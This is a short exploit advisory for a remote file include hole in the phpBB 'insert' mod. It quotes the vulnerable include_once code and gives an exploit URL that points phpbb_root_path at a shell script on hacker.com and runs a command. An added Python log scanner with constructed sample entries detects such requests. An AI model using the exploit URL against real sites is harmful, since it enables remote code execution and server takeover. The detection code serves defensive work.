
Phpbb insert mod Remote file include




$ BiyoSecurity.Org & SecurityWall.Org

$ Script Name : Phpbb insert module

$ Versions : 0.1.0 and 0.1.1

$ Risk : High

$ Regard : KorsaN

$ Thanks : Liz0zim , RMx , TR_IP , DreamLord , Kubra

$ Vulnerable File : functions_mod_user.php

$ Vulnerable code : 

<-- code start -->

include_once($phpbb_root_path . 'includes/functions_validate.' . $phpEx);
include_once($phpbb_root_path . 'includes/functions_post.' . $phpEx);
include_once($phpbb_root_path . 'includes/bbcode.' . $phpEx);

<-- code end -->

$ Exploit : 

www.victim.com/[path]/functions_mod_user.php?phpbb_root_path=http://hacker.com/shell.txt?&cmd=ls 
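
Added example (not part of the original advisory): a log check for requests that supply phpbb_root_path with a remote value, the request shape shown above. The log lines, addresses and example.invalid host are constructed sample data, and all function names are hypothetical.

```python
import re
from urllib.parse import parse_qsl, unquote

# Variable the vulnerable include_once() lines are built on (from the advisory).
WATCHED_PARAMS = {"phpbb_root_path"}
# Value that begins with a URL scheme / stream wrapper, or a protocol-relative "//host".
REMOTE_VALUE = re.compile(r"^\s*(?:[a-z][a-z0-9+.\-]+:|//)", re.IGNORECASE)
# Request target inside a common/combined log format entry.
REQUEST_LINE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def fully_unquote(value, rounds=3):
    """Undo repeated percent-encoding (bounded) so %2568ttp is read as http."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def remote_include_params(target):
    """Return (name, value) pairs where a watched parameter points off-host."""
    hits = []
    query = target.partition("?")[2]
    for name, value in parse_qsl(query, keep_blank_values=True):
        # PHP maps "." and " " in parameter names to "_" and accepts name[] syntax.
        name = fully_unquote(name).lower().replace(".", "_").replace(" ", "_")
        base = name.split("[", 1)[0]
        value = fully_unquote(value)
        if base in WATCHED_PARAMS and REMOTE_VALUE.match(value):
            hits.append((base, value))
    return hits

def scan(lines):
    """Return [(line_number, hits)] for every log line that trips the check."""
    findings = []
    for number, line in enumerate(lines, 1):
        match = REQUEST_LINE.search(line)
        hits = remote_include_params(match.group(1)) if match else []
        if hits:
            findings.append((number, hits))
    return findings

SAMPLE_LOG = [  # constructed entries, not taken from a real server
    '192.0.2.10 - - [01/Jan/2006:10:00:00 +0000] "GET /forum/viewtopic.php?t=42 HTTP/1.1" 200 5120',
    '203.0.113.7 - - [01/Jan/2006:10:00:05 +0000] "GET /forum/functions_mod_user.php?phpbb_root_path=http://example.invalid/x.txt? HTTP/1.0" 200 312',
    '203.0.113.7 - - [01/Jan/2006:10:00:09 +0000] "GET /forum/functions_mod_user.php?phpbb%5Froot%5Fpath=%2568ttp%3A%2F%2Fexample.invalid%2Fx.txt HTTP/1.0" 200 312',
    '192.0.2.44 - - [01/Jan/2006:10:01:00 +0000] "GET /forum/index.php?redirect=http://example.invalid/ HTTP/1.1" 302 0',
]
```

Access logs record only the query string, so a value sent in a POST body or cookie is not visible to this check.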
